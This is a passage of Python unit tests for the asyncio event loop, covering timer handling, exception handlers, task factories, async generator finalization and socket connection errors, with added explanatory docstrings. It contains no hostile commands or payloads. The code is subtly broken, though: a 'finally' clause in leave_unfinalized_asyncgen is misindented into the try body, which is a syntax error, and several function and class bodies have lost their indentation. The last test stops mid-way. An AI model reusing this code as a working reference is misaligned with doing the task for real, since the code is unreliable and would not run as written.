self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
    """_run_once() drops a cancelled timer handle and uses the earliest
    remaining timer (here ~10s away) as the select() timeout."""
    h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
                             self.loop, None)
    h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
                             self.loop, None)
    h1.cancel()
    self.loop._process_events = mock.Mock()
    self.loop._scheduled.append(h1)
    self.loop._scheduled.append(h2)
    self.loop._run_once()
    # The timeout passed to select() should reflect h2's deadline.
    t = self.loop._selector.select.call_args[0][0]
    self.assertTrue(9.5 < t < 10.5, t)
    self.assertEqual([h2], self.loop._scheduled)
    self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test__run_once_schedule_handle(self):
    """A timer callback that fires during _run_once() may itself schedule
    a new ready callback; verify it lands on the ready queue."""
    handle = None
    processed = False
    def cb(loop):
        nonlocal processed, handle
        processed = True
        handle = loop.call_soon(lambda: True)
    # Deadline in the past so the timer fires on the first iteration.
    h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
                            self.loop, None)
    self.loop._process_events = mock.Mock()
    self.loop._scheduled.append(h)
    self.loop._run_once()
    self.assertTrue(processed)
    self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
    """_run_once() removes cancelled timer handles at the head of the
    queue immediately, but purges interior cancelled handles only once
    their count exceeds both _MIN_SCHEDULED_TIMER_HANDLES and the
    _MIN_CANCELLED_TIMER_HANDLES_FRACTION thresholds."""
    self.loop._process_events = mock.Mock()
    self.assertTrue(
        0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
    def cb():
        pass
    # Set up one "blocking" event that will not be cancelled to
    # ensure later cancelled events do not make it to the head
    # of the queue and get cleaned.
    not_cancelled_count = 1
    self.loop.call_later(3000, cb)
    # Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
    # cancelled handles, ensure they aren't removed
    cancelled_count = 2
    for x in range(2):
        h = self.loop.call_later(3600, cb)
        h.cancel()
    # Add some cancelled events that will be at head and removed
    cancelled_count += 2
    for x in range(2):
        h = self.loop.call_later(100, cb)
        h.cancel()
    # This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
    self.assertLessEqual(cancelled_count + not_cancelled_count,
                         base_events._MIN_SCHEDULED_TIMER_HANDLES)
    self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
    self.loop._run_once()
    # Only the two cancelled handles at the queue head were popped.
    cancelled_count -= 2
    self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
    self.assertEqual(len(self.loop._scheduled),
                     cancelled_count + not_cancelled_count)
    # Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
    # so that deletion of cancelled events will occur on next _run_once
    add_cancel_count = int(math.ceil(
        base_events._MIN_SCHEDULED_TIMER_HANDLES *
        base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
    add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
                               add_cancel_count, 0)
    # Add some events that will not be cancelled
    not_cancelled_count += add_not_cancel_count
    for x in range(add_not_cancel_count):
        self.loop.call_later(3600, cb)
    # Add enough cancelled events
    cancelled_count += add_cancel_count
    for x in range(add_cancel_count):
        h = self.loop.call_later(3600, cb)
        h.cancel()
    # Ensure all handles are still scheduled
    self.assertEqual(len(self.loop._scheduled),
                     cancelled_count + not_cancelled_count)
    self.loop._run_once()
    # Ensure cancelled events were removed
    self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
    # Ensure only uncancelled events remain scheduled
    self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
    """run_until_complete() rejects a plain string (not awaitable)."""
    with self.assertRaises(TypeError):
        self.loop.run_until_complete('blah')
def test_run_until_complete_loop(self):
    """A future bound to one loop cannot be driven by another loop."""
    fut = asyncio.Future(loop=self.loop)
    other = self.new_test_loop()
    self.addCleanup(other.close)
    with self.assertRaises(ValueError):
        other.run_until_complete(fut)
def test_run_until_complete_loop_orphan_future_close_loop(self):
    """run_until_complete() must detach its done-callback from a future
    that was aborted by a BaseException, so a later run succeeds."""
    class ShowStopper(SystemExit):
        pass
    async def foo(delay):
        await asyncio.sleep(delay)
    def throw():
        raise ShowStopper
    self.loop._process_events = mock.Mock()
    self.loop.call_soon(throw)
    with self.assertRaises(ShowStopper):
        self.loop.run_until_complete(foo(0.1))
    # This call fails if run_until_complete does not clean up
    # done-callback for the previous future.
    self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
    """subprocess_exec() raises TypeError for malformed program arguments
    and for the subprocess.Popen options it deliberately forbids."""
    args = [sys.executable, '-c', 'pass']
    # missing program parameter (empty args)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol)
    # expected multiple arguments, not a list
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, args)
    # program arguments must be strings, not int
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, sys.executable, 123)
    # universal_newlines, shell, bufsize must not be set
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, *args, universal_newlines=True)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, *args, shell=True)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_exec,
        asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
    """subprocess_shell() requires a single command string and rejects
    the forbidden subprocess.Popen options."""
    # expected a string, not an int or a list
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, 123)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
    # universal_newlines, shell, bufsize must not be set
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, 'exit 0', shell=True)
    self.assertRaises(TypeError,
        self.loop.run_until_complete, self.loop.subprocess_shell,
        asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
    """The default exception handler logs callback exceptions via
    asyncio.base_events.logger, for both call_soon and call_later."""
    self.loop._process_events = mock.Mock()
    def zero_error(fut):
        # Complete the future first so the loop gets stopped, then raise.
        fut.set_result(True)
        1/0
    # Test call_soon (events.Handle)
    with mock.patch('asyncio.base_events.logger') as log:
        fut = asyncio.Future(loop=self.loop)
        self.loop.call_soon(zero_error, fut)
        fut.add_done_callback(lambda fut: self.loop.stop())
        self.loop.run_forever()
        log.error.assert_called_with(
            test_utils.MockPattern('Exception in callback.*zero'),
            exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
    # Test call_later (events.TimerHandle)
    with mock.patch('asyncio.base_events.logger') as log:
        fut = asyncio.Future(loop=self.loop)
        self.loop.call_later(0.01, zero_error, fut)
        fut.add_done_callback(lambda fut: self.loop.stop())
        self.loop.run_forever()
        log.error.assert_called_with(
            test_utils.MockPattern('Exception in callback.*zero'),
            exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
    """An exception raised in a coroutine whose result is never retrieved
    is logged when the future is garbage collected."""
    self.loop._process_events = mock.Mock()
    async def zero_error_coro():
        await asyncio.sleep(0.01)
        1/0
    # Test Future.__del__
    with mock.patch('asyncio.base_events.logger') as log:
        fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
        fut.add_done_callback(lambda *args: self.loop.stop())
        self.loop.run_forever()
        fut = None  # Trigger Future.__del__ or futures._TracebackLogger
        support.gc_collect()
        # NOTE(review): PY34 is a module-level flag defined outside this
        # chunk; presumably it selects the 3.4+ logging format — confirm.
        if PY34:
            # Future.__del__ in Python 3.4 logs error with
            # an actual exception context
            log.error.assert_called_with(
                test_utils.MockPattern('.*exception was never retrieved'),
                exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
        else:
            # futures._TracebackLogger logs only textual traceback
            log.error.assert_called_with(
                test_utils.MockPattern(
                    '.*exception was never retrieved.*ZeroDiv'),
                exc_info=False)
def test_set_exc_handler_invalid(self):
    """set_exception_handler() rejects objects that are not callable."""
    with self.assertRaisesRegex(TypeError, 'A callable object or None'):
        self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
    """A custom exception handler receives the error context; resetting
    the handler to None restores default logging behaviour."""
    def zero_error():
        1/0
    def run_loop():
        handle = self.loop.call_soon(zero_error)
        self.loop._run_once()
        return handle
    # Debug mode populates handle._source_traceback, checked below.
    self.loop.set_debug(True)
    self.loop._process_events = mock.Mock()
    self.assertIsNone(self.loop.get_exception_handler())
    mock_handler = mock.Mock()
    self.loop.set_exception_handler(mock_handler)
    self.assertIs(self.loop.get_exception_handler(), mock_handler)
    handle = run_loop()
    mock_handler.assert_called_with(self.loop, {
        'exception': MOCK_ANY,
        'message': test_utils.MockPattern(
            'Exception in callback.*zero_error'),
        'handle': handle,
        'source_traceback': handle._source_traceback,
    })
    mock_handler.reset_mock()
    self.loop.set_exception_handler(None)
    with mock.patch('asyncio.base_events.logger') as log:
        run_loop()
        log.error.assert_called_with(
            test_utils.MockPattern(
                'Exception in callback.*zero'),
            exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
    # The custom handler must not be invoked after it was removed.
    assert not mock_handler.called
def test_set_exc_handler_broken(self):
    """If a custom exception handler itself raises, the loop logs
    'Unhandled error in exception handler' instead of crashing."""
    def run_loop():
        def zero_error():
            1/0
        self.loop.call_soon(zero_error)
        self.loop._run_once()
    def handler(loop, context):
        raise AttributeError('spam')
    self.loop._process_events = mock.Mock()
    self.loop.set_exception_handler(handler)
    with mock.patch('asyncio.base_events.logger') as log:
        run_loop()
        log.error.assert_called_with(
            test_utils.MockPattern(
                'Unhandled error in exception handler'),
            exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
    """If default_exception_handler() itself raises, the loop logs
    'Exception in default exception handler' — both when it is invoked
    directly and when it is invoked because a custom handler failed.
    The original error context must still reach the default handler."""
    _context = None
    class Loop(base_events.BaseEventLoop):
        _selector = mock.Mock()
        _process_events = mock.Mock()
        def default_exception_handler(self, context):
            nonlocal _context
            _context = context
            # Simulates custom buggy "default_exception_handler"
            raise ValueError('spam')
    loop = Loop()
    self.addCleanup(loop.close)
    asyncio.set_event_loop(loop)
    def run_loop():
        def zero_error():
            1/0
        loop.call_soon(zero_error)
        loop._run_once()
    with mock.patch('asyncio.base_events.logger') as log:
        run_loop()
        log.error.assert_called_with(
            'Exception in default exception handler',
            exc_info=True)
    def custom_handler(loop, context):
        raise ValueError('ham')
    _context = None
    loop.set_exception_handler(custom_handler)
    with mock.patch('asyncio.base_events.logger') as log:
        run_loop()
        log.error.assert_called_with(
            test_utils.MockPattern('Exception in default exception.*'
                                   'while handling.*in custom'),
            exc_info=True)
        # Check that original context was passed to default
        # exception handler.
        self.assertIn('context', _context)
        self.assertIs(type(_context['context']['exception']),
                      ZeroDivisionError)
def test_set_task_factory_invalid(self):
    """set_task_factory() rejects non-callable factories and leaves the
    factory unset."""
    with self.assertRaisesRegex(
            TypeError, 'task factory must be a callable or None'):
        self.loop.set_task_factory(1)
    self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
    """create_task() uses the installed task factory, and reverts to
    producing plain asyncio.Task instances once the factory is cleared."""
    self.loop._process_events = mock.Mock()
    class MyTask(asyncio.Task):
        pass
    async def coro():
        pass
    factory = lambda loop, coro: MyTask(coro, loop=loop)
    self.assertIsNone(self.loop.get_task_factory())
    self.loop.set_task_factory(factory)
    self.assertIs(self.loop.get_task_factory(), factory)
    task = self.loop.create_task(coro())
    self.assertTrue(isinstance(task, MyTask))
    self.loop.run_until_complete(task)
    self.loop.set_task_factory(None)
    self.assertIsNone(self.loop.get_task_factory())
    task = self.loop.create_task(coro())
    self.assertTrue(isinstance(task, asyncio.Task))
    self.assertFalse(isinstance(task, MyTask))
    self.loop.run_until_complete(task)
def test_env_var_debug(self):
    """Loop debug mode is controlled by PYTHONASYNCIODEBUG and by
    -X dev, checked in subprocesses via assert_python_ok()."""
    code = '\n'.join((
        'import asyncio',
        'loop = asyncio.get_event_loop()',
        'print(loop.get_debug())'))
    # Test with -E to not fail if the unit test was run with
    # PYTHONASYNCIODEBUG set to a non-empty string
    sts, stdout, stderr = assert_python_ok('-E', '-c', code)
    self.assertEqual(stdout.rstrip(), b'False')
    sts, stdout, stderr = assert_python_ok('-c', code,
                                           PYTHONASYNCIODEBUG='',
                                           PYTHONDEVMODE='')
    self.assertEqual(stdout.rstrip(), b'False')
    sts, stdout, stderr = assert_python_ok('-c', code,
                                           PYTHONASYNCIODEBUG='1',
                                           PYTHONDEVMODE='')
    self.assertEqual(stdout.rstrip(), b'True')
    # -E makes the interpreter ignore the environment variable.
    sts, stdout, stderr = assert_python_ok('-E', '-c', code,
                                           PYTHONASYNCIODEBUG='1')
    self.assertEqual(stdout.rstrip(), b'False')
    # -X dev
    sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
                                           '-c', code)
    self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
    """ensure_future() defers to the loop's create_task() override."""
    class MyTask(asyncio.Task):
        pass
    async def test():
        pass
    class EventLoop(base_events.BaseEventLoop):
        def create_task(self, coro):
            return MyTask(coro, loop=loop)
    loop = EventLoop()
    self.set_event_loop(loop)
    coro = test()
    task = asyncio.ensure_future(coro, loop=loop)
    self.assertIsInstance(task, MyTask)
    # make warnings quiet
    task._log_destroy_pending = False
    coro.close()
def test_create_named_task_with_default_factory(self):
    """create_task(name=...) sets the task name when using the default
    task factory."""
    async def test():
        pass
    loop = asyncio.new_event_loop()
    task = loop.create_task(test(), name='test_task')
    try:
        self.assertEqual(task.get_name(), 'test_task')
    finally:
        # Always drain the task and close the loop, even on failure.
        loop.run_until_complete(task)
        loop.close()
def test_create_named_task_with_custom_factory(self):
    """create_task(name=...) also names tasks produced by a custom task
    factory that does not handle the name itself."""
    def task_factory(loop, coro):
        return asyncio.Task(coro, loop=loop)
    async def test():
        pass
    loop = asyncio.new_event_loop()
    loop.set_task_factory(task_factory)
    task = loop.create_task(test(), name='test_task')
    try:
        self.assertEqual(task.get_name(), 'test_task')
    finally:
        loop.run_until_complete(task)
        loop.close()
def test_run_forever_keyboard_interrupt(self):
    """run_until_complete()'s internal task must consume a
    KeyboardInterrupt without reporting it to the exception handler."""
    # Python issue #22601: ensure that the temporary task created by
    # run_forever() consumes the KeyboardInterrupt and so doesn't log
    # a warning
    async def raise_keyboard_interrupt():
        raise KeyboardInterrupt
    self.loop._process_events = mock.Mock()
    self.loop.call_exception_handler = mock.Mock()
    try:
        self.loop.run_until_complete(raise_keyboard_interrupt())
    except KeyboardInterrupt:
        pass
    self.loop.close()
    support.gc_collect()
    self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
    """A BaseException escaping run_until_complete() must not leave a
    stale stop() scheduled on the loop."""
    # Python issue #22429: run_until_complete() must not schedule a pending
    # call to stop() if the future raised a BaseException
    async def raise_keyboard_interrupt():
        raise KeyboardInterrupt
    self.loop._process_events = mock.Mock()
    try:
        self.loop.run_until_complete(raise_keyboard_interrupt())
    except KeyboardInterrupt:
        pass
    def func():
        self.loop.stop()
        func.called = True
    func.called = False
    try:
        # If a stale stop() were pending, the loop would stop before
        # func runs and func.called would remain False.
        self.loop.call_soon(func)
        self.loop.run_forever()
    except KeyboardInterrupt:
        pass
    self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
    """A stopped event loop must not re-run an event callback.

    Regression test for Python issue #25593: when the selector keeps
    reporting the same event across run_forever() calls, the callback
    scheduled for it must fire exactly once.
    """
    event_sentinel = object()
    callcount = 0
    doer = None

    def proc_events(event_list):
        # Schedule do_event() whenever the sentinel event is reported.
        nonlocal doer
        if event_sentinel in event_list:
            doer = self.loop.call_soon(do_event)

    def do_event():
        nonlocal callcount
        callcount += 1
        self.loop.call_soon(clear_selector)

    def clear_selector():
        # Cancel the pending handle so it cannot fire again.
        doer.cancel()

    self.loop._process_events = proc_events
    # The mocked selector reports the sentinel event on every select().
    # (A redundant `select.return_value = ()` assignment that was
    # immediately overwritten by the line below has been removed.)
    self.loop._selector.select.return_value = (event_sentinel,)

    for i in range(1, 3):
        with self.subTest('Loop %d/2' % i):
            self.loop.call_soon(self.loop.stop)
            self.loop.run_forever()
            self.assertEqual(callcount, 1)
def test_run_once(self):
    """test_utils.run_once() executes exactly one pending callback."""
    # Simple test for test_utils.run_once(). It may seem strange
    # to have a test for this (the function isn't even used!) but
    # it's a de-facto standard API for library tests. This tests
    # the idiom: loop.call_soon(loop.stop); loop.run_forever().
    count = 0
    def callback():
        nonlocal count
        count += 1
    self.loop._process_events = mock.Mock()
    self.loop.call_soon(callback)
    test_utils.run_once(self.loop)
    self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
    """Calling stop() before run_forever() makes the loop do a single
    zero-timeout select() and return immediately."""
    # Test that the old idiom for pre-stopping the loop works.
    self.loop._process_events = mock.Mock()
    self.loop.stop()
    self.loop.run_forever()
    self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
    """Start an async generator, advance it partway, and abandon it.

    Returns the shared ``status`` dict (started/stopped/finalized flags)
    so callers can observe when the generator is finalized by GC.
    """
    # Create an async generator, iterate it partially, and leave it
    # to be garbage collected.
    # Used in async generator finalization tests.
    # Depends on implementation details of garbage collector. Changes
    # in gc may break this function.
    status = {'started': False,
              'stopped': False,
              'finalized': False}
    async def agen():
        status['started'] = True
        try:
            for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
                yield item
            finally:
                status['finalized'] = True
    ag = agen()
    ai = ag.__aiter__()
    async def iter_one():
        # Pull a single item; flag 'stopped' once 'THREE' is seen so the
        # generator is left suspended with items remaining.
        try:
            item = await ai.__anext__()
        except StopAsyncIteration:
            return
        if item == 'THREE':
            status['stopped'] = True
            return
    asyncio.create_task(iter_one())
    asyncio.create_task(iter_one())
    return status
def test_asyncgen_finalization_by_gc(self):
    """An abandoned async generator is finalized once the garbage
    collector runs (with automatic gc disabled until then)."""
    # Async generators should be finalized when garbage collected.
    self.loop._process_events = mock.Mock()
    self.loop._write_to_self = mock.Mock()
    with support.disable_gc():
        status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
        while not status['stopped']:
            test_utils.run_briefly(self.loop)
        self.assertTrue(status['started'])
        self.assertTrue(status['stopped'])
        # Not finalized yet: gc is disabled.
        self.assertFalse(status['finalized'])
        support.gc_collect()
        test_utils.run_briefly(self.loop)
        self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
    """Async generators are finalized even when gc_collect() runs in an
    executor thread and the loop is in debug mode."""
    # Python issue 34769: If garbage collector runs in another
    # thread, async generators will not finalize in debug
    # mode.
    self.loop._process_events = mock.Mock()
    self.loop._write_to_self = mock.Mock()
    self.loop.set_debug(True)
    with support.disable_gc():
        status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
        while not status['stopped']:
            test_utils.run_briefly(self.loop)
        self.assertTrue(status['started'])
        self.assertTrue(status['stopped'])
        self.assertFalse(status['finalized'])
        # Run the collection from a worker thread via the executor.
        self.loop.run_until_complete(
            self.loop.run_in_executor(None, support.gc_collect))
        test_utils.run_briefly(self.loop)
        self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
    """Stream protocol used by these tests; asserts its state machine.

    State progresses INITIAL -> CONNECTED -> EOF -> CLOSED and each
    callback asserts it runs in the expected state. Tracks the number of
    bytes received in ``nbytes``.
    """
    # Future completed in connection_lost() when create_future=True.
    done = None

    def __init__(self, create_future=False):
        self.state = 'INITIAL'
        self.nbytes = 0
        if create_future:
            self.done = asyncio.Future()

    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'CONNECTED'
        # Send a minimal HTTP request so the peer has something to answer.
        transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')

    def data_received(self, data):
        assert self.state == 'CONNECTED', self.state
        self.nbytes += len(data)

    def eof_received(self):
        assert self.state == 'CONNECTED', self.state
        self.state = 'EOF'

    def connection_lost(self, exc):
        assert self.state in ('CONNECTED', 'EOF'), self.state
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
    """Datagram protocol used by these tests; asserts its state machine.

    State progresses INITIAL -> INITIALIZED -> CLOSED; tracks received
    byte count in ``nbytes``.
    """
    # Future completed in connection_lost() when create_future=True.
    done = None

    def __init__(self, create_future=False, loop=None):
        self.state = 'INITIAL'
        self.nbytes = 0
        if create_future:
            self.done = asyncio.Future(loop=loop)

    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'INITIALIZED'

    def datagram_received(self, data, addr):
        assert self.state == 'INITIALIZED', self.state
        self.nbytes += len(data)

    def error_received(self, exc):
        assert self.state == 'INITIALIZED', self.state

    def connection_lost(self, exc):
        assert self.state == 'INITIALIZED', self.state
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
    """Create a fresh SelectorEventLoop and install it for the test."""
    super().setUp()
    self.loop = asyncio.SelectorEventLoop()
    self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
    """loop.getnameinfo() delegates to socket.getnameinfo and returns
    its result."""
    m_gai.side_effect = lambda *args: 42
    r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
    self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
    """When every resolved address fails, create_connection() raises an
    OSError aggregating all of the individual errors."""
    class MyProto(asyncio.Protocol):
        pass
    async def getaddrinfo(*args, **kw):
        return [(2, 1, 6, '', ('107.6.106.82', 80)),
                (2, 1, 6, '', ('107.6.106.82', 80))]
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    idx = -1
    errors = ['err1', 'err2']
    def _socket(*args, **kw):
        # Fail socket creation with a different message per attempt.
        nonlocal idx, errors
        idx += 1
        raise OSError(errors[idx])
    m_socket.socket = _socket
    self.loop.getaddrinfo = getaddrinfo_task
    coro = self.loop.create_connection(MyProto, 'example.com', 80)
    with self.assertRaises(OSError) as cm:
        self.loop.run_until_complete(coro)
    self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
    """The socket created by create_connection() is closed when the
    connect attempt times out."""
    # Ensure that the socket is closed on timeout
    sock = mock.Mock()
    m_socket.socket.return_value = sock
    def getaddrinfo(*args, **kw):
        fut = asyncio.Future(loop=self.loop)
        addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
                ('127.0.0.1', 80))
        fut.set_result([addr])
        return fut
    self.loop.getaddrinfo = getaddrinfo
    with mock.patch.object(self.loop, 'sock_connect',
                           side_effect=asyncio.TimeoutError):
        coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
        with self.assertRaises(asyncio.TimeoutError):
            self.loop.run_until_complete(coro)
        self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
    """Passing host/port together with sock= raises ValueError."""
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, sock=object())
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(coro)
def test_create_connection_wrong_sock(self):
    """create_connection() rejects a datagram (non-stream) socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    with sock:
        coro = self.loop.create_connection(MyProto, sock=sock)
        with self.assertRaisesRegex(ValueError,
                                    'A Stream Socket was expected'):
            self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
    """create_server() rejects a datagram (non-stream) socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    with sock:
        coro = self.loop.create_server(MyProto, sock=sock)
        with self.assertRaisesRegex(ValueError,
                                    'A Stream Socket was expected'):
            self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
    """create_server() rejects ssl_handshake_timeout without ssl."""
    coro = self.loop.create_server(
        MyProto, 'example.com', 80, ssl_handshake_timeout=1)
    with self.assertRaisesRegex(
            ValueError,
            'ssl_handshake_timeout is only meaningful with ssl'):
        self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
                     'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
    """A socket whose type includes SOCK_NONBLOCK bits is still accepted
    as a stream socket by create_server()."""
    sock = socket.socket(
        socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
    with sock:
        coro = self.loop.create_server(lambda: None, sock=sock)
        srv = self.loop.run_until_complete(coro)
        srv.close()
        self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(support.IPV6_ENABLED, 'no IPv6 support')
def test_create_server_ipv6(self):
    """start_server() can bind to the IPv6 loopback address; skip when
    the platform cannot bind ::1 (EADDRNOTAVAIL)."""
    async def main():
        # The explicit loop= argument triggers a DeprecationWarning.
        with self.assertWarns(DeprecationWarning):
            srv = await asyncio.start_server(
                lambda: None, '::1', 0, loop=self.loop)
        try:
            self.assertGreater(len(srv.sockets), 0)
        finally:
            srv.close()
            await srv.wait_closed()
    try:
        self.loop.run_until_complete(main())
    except OSError as ex:
        if (hasattr(errno, 'EADDRNOTAVAIL') and
                ex.errno == errno.EADDRNOTAVAIL):
            self.skipTest('failed to bind to ::1')
        else:
            raise
def test_create_datagram_endpoint_wrong_sock(self):
    """create_datagram_endpoint() rejects a stream (non-UDP) socket."""
    sock = socket.socket(socket.AF_INET)
    with sock:
        coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
        with self.assertRaisesRegex(ValueError,
                                    'A UDP Socket was expected'):
            self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
    """Omitting host, port and sock raises ValueError."""
    coro = self.loop.create_connection(MyProto)
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(coro)
def test_create_connection_no_getaddrinfo(self):
    """create_connection() raises OSError when name resolution yields
    no addresses."""
    async def getaddrinfo(*args, **kw):
        return []
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    coro = self.loop.create_connection(MyProto, 'example.com', 80)
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
    """create_connection() propagates OSError from sock_connect when the
    single resolved address fails."""
    async def getaddrinfo(*args, **kw):
        return [(2, 1, 6, '', ('107.6.106.82', 80))]
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.side_effect = OSError
    coro = self.loop.create_connection(MyProto, 'example.com', 80)
    self.assertRaises(
        OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
    """create_connection() raises OSError when connecting fails for
    every one of multiple resolved addresses."""
    async def getaddrinfo(*args, **kw):
        return [(2, 1, 6, '', ('0.0.0.1', 80)),
                (2, 1, 6, '', ('0.0.0.2', 80))]
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.side_effect = OSError
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, family=socket.AF_INET)
    with self.assertRaises(OSError):
        self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
    """With local_addr set, bind and connect failures across multiple
    addresses are aggregated into one 'Multiple exceptions' OSError and
    the socket is closed."""
    def bind(addr):
        # Fail bind only for the first resolved address.
        if addr[0] == '0.0.0.1':
            err = OSError('Err')
            err.strerror = 'Err'
            raise err
    m_socket.socket.return_value.bind = bind
    async def getaddrinfo(*args, **kw):
        return [(2, 1, 6, '', ('0.0.0.1', 80)),
                (2, 1, 6, '', ('0.0.0.2', 80))]
    def getaddrinfo_task(*args, **kwds):
        return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
    self.loop.getaddrinfo = getaddrinfo_task
    self.loop.sock_connect = mock.Mock()
    self.loop.sock_connect.side_effect = OSError('Err2')
    coro = self.loop.create_connection(
        MyProto, 'example.com', 80, family=socket.AF_INET,
        local_addr=(None, 8080))
    with self.assertRaises(OSError) as cm:
        self.loop.run_until_complete(coro)
